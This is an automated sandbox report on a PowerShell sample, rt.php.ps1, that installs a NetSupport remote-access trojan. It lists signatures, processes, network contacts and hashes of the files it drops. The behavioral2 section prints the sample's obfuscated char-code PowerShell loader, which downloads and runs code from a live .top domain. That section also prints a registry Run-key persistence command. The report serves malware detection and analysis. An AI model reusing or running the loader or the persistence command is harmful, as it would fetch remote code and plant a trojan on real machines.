Malware Analysis Report

2025-06-16 05:06

Sample ID 230530-vsnwlsbc3z
Target rt.php.ps1
SHA256 8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d

Threat Level: Known bad

The file rt.php.ps1 was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-30 17:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-30 17:15

Reported

2023-05-30 17:17

Platform

win7-20230220-en

Max time kernel

29s

Max time network

31s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Network

N/A

Files

memory/1208-58-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

memory/1208-59-0x0000000002020000-0x0000000002028000-memory.dmp

memory/1208-60-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-61-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-62-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-63-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-64-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-65-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-66-0x0000000002030000-0x00000000020B0000-memory.dmp

memory/1208-67-0x0000000002030000-0x00000000020B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-30 17:15

Reported

2023-05-30 17:17

Platform

win10v2004-20230220-en

Max time kernel

37s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\QNSeJO3wL5Kv\\whost.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe""

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 dz7eg.top udp
US 143.244.162.145:80 dz7eg.top tcp
US 8.8.8.8:53 145.162.244.143.in-addr.arpa udp
US 8.8.8.8:53 4.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 fduic.top udp
DE 167.235.159.22:443 fduic.top tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 22.159.235.167.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 32.18.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
IE 20.50.73.11:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nksic0el.kdc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3760-133-0x000001D3E5020000-0x000001D3E5042000-memory.dmp

memory/3760-143-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp

memory/3760-144-0x000001D3E50A0000-0x000001D3E50B0000-memory.dmp

memory/4176-154-0x00000284C6E60000-0x00000284C6E70000-memory.dmp

memory/4176-155-0x00000284C6E60000-0x00000284C6E70000-memory.dmp

memory/4176-156-0x00000284C6E60000-0x00000284C6E70000-memory.dmp

memory/3760-160-0x000001D3E77D0000-0x000001D3E77DA000-memory.dmp

memory/3760-161-0x000001D3E7800000-0x000001D3E7812000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/388-190-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp

memory/388-191-0x000001EEFDD80000-0x000001EEFDD90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f5f268a3d8760169bde3db6e00da5e6c
SHA1 00dc2443a967bf09147612f53ea5fc6a2cfb0b40
SHA256 b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5
SHA512 c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\client32.ini

MD5 5d2b788f10e973fce372fa2e4ececd4e
SHA1 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1
SHA256 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475
SHA512 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\NSM.LIC

MD5 390c964070626a64888d385c514f568e
SHA1 a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256 ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512 f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

C:\Users\Admin\AppData\Roaming\QNSeJO3wL5Kv\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c